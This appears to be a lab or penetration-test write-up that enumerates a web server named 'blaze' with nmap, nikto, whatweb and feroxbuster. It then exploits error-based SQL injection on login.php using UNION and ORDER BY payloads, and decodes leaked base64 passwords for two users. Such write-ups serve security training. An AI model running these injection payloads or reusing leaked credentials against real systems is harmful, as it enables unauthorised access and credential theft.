HyperText Transport Protocol
Environment Variables / Setup#
export IP=192.168.109.10
export PORT=80
export URL=http://$IP:$PORT
nmap#
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)"
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-feed: Couldn't find any feeds.
| http-php-version: Logo query returned unknown hash 862a0ac446ba7dfef3c7ff3026777e84
|_Credits query returned unknown hash 862a0ac446ba7dfef3c7ff3026777e84
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-malware-host: Host appears to be clean
|_http-title: blaze
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-date: Thu, 07 Aug 2025 23:23:49 GMT; 0s from local time.
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.109.10
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 82
| Comment:
| /* z-index: -1; */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 4
| Comment:
| /*
| font-family: 'PT Sans', sans-serif;
| font-family: 'Source Sans Pro', sans-serif;
| font-family: 'Roboto Slab', serif;
| font-family: 'Open Sans', sans-serif;
| */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 181
| Comment:
| /* text-align:center; */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 177
| Comment:
| /* */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 67
| Comment:
| /* background-image:url("https://source.unsplash.com/l3N9Q27zULw"); */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 270
| Comment:
| /* width: 110%; */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 23
| Comment:
| /* Colors */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 90
| Comment:
| /* width:50%; */
|
| Path: http://192.168.109.10:80/css/index.css
| Line number: 18
| Comment:
|_ /* Fonts */
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cookie-flags:
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-errors: Couldn't find any error pages.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-mobileversion-checker: No mobile version detected.
| http-headers:
| Date: Thu, 07 Aug 2025 23:23:54 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Last-Modified: Wed, 29 Mar 2023 06:51:19 GMT
| ETag: "d15-5f8046741ae2b"
| Accept-Ranges: bytes
| Content-Length: 3349
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-vhosts:
|_128 names had status 200
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1
| /css/
| css: 1
| Longest directory structure:
| Depth: 1
| Dir: /css/
| Total files found (by extension):
|_ Other: 1; css: 1
|_http-chrono: Request times for /; avg: 285.53ms; min: 266.81ms; max: 334.22ms
| http-enum:
| /login.php: Possible admin folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
nikto#
nikto -ask=no -Tuning=x4567890ac -nointeractive -host http://192.168.109.10:80 2>&1
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: d15, size: 5f8046741ae2b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /login.php: Admin login page/section found.
+ 7729 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2025-08-07 16:38:49 (GMT-7) (907 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Identify Tech Stack#
whatweb#
whatweb $URL
http://192.168.109.10:80 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.109.10], Title[blaze]
Content Discovery#
(Autorecon Feroxbuster)
feroxbuster -u http://192.168.109.10:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -r -o "/home/kali/cockpit/autorecon/results/192.168.109.10/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
200 GET 278l 506w 5366c http://192.168.109.10/css/index.css
200 GET 78l 321w 3349c http://192.168.109.10/
200 GET 29l 60w 477c http://192.168.109.10/css/type.css
200 GET 10l 28w 233c http://192.168.109.10/blocked.html
200 GET 65l 128w 1108c http://192.168.109.10/css/style.css
200 GET 18l 77w 1323c http://192.168.109.10/css/
200 GET 78l 321w 3349c http://192.168.109.10/index.html
200 GET 707l 4190w 598838c http://192.168.109.10/img/blaze.png
200 GET 16l 58w 935c http://192.168.109.10/img/
200 GET 29l 85w 913c http://192.168.109.10/js/index.js
200 GET 16l 60w 932c http://192.168.109.10/js/
200 GET 28l 63w 769c http://192.168.109.10/login.php
200 GET 0l 0w 0c http://192.168.109.10/db_config.php
Look into login.php below…
Robots.txt#
curl $URL/robots.txt
(Does not exist)
Manual Enumeration#
(Walk application functionality in Burp Suite)

The “Purchase” and “Buy now” buttons just link between anchors on the page.
The page’s title, “blaze,” is interesting.
login.php SQL injection#
On /login.php, discovered in our feroxbuster enumeration, there is a login form. Some guesses at default credentials don’t work, but by entering a single quote in the username field, we find that the application leaks a MySQL error, indicating it’s vulnerable to error-based SQL injection.

I’ll continue enumerating this injection in the user field:
test ' UNION SELECT MySQL.User(); -- -
Error: execute command denied to user 'admin'@'localhost' for routine 'MySQL.User'
test ' UNION SELECT @@version; -- -
Error: The used SELECT statements have a different number of columns
Find number of columns returned by changing value:
test ' ORDER BY 10;-- -;

Starting high and decrementing, it seems there are 5 columns, as any higher than that creates a MySQL error.
test ' ORDER BY 10;-- -;

Use this to get union clause injection working:
test ' UNION SELECT @@version, NULL, NULL, NULL, NULL-- -
For some reason this redirects me to /password-dashboard.php, which displays usernames and passwords for ‘james’ and ‘cameron’ ????

james Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy
Decoding from base64, we have their passwords in plaintext (reminder to use secure password hashing algorithms when storing credentials – added to Findings as a further vulnerability):
james canttouchhhthiss@455152
cameron thisscanttbetouchedd@455152
These credentials aren’t valid on this page, but james’ does work against 9090 HTTP – we’ll continue there.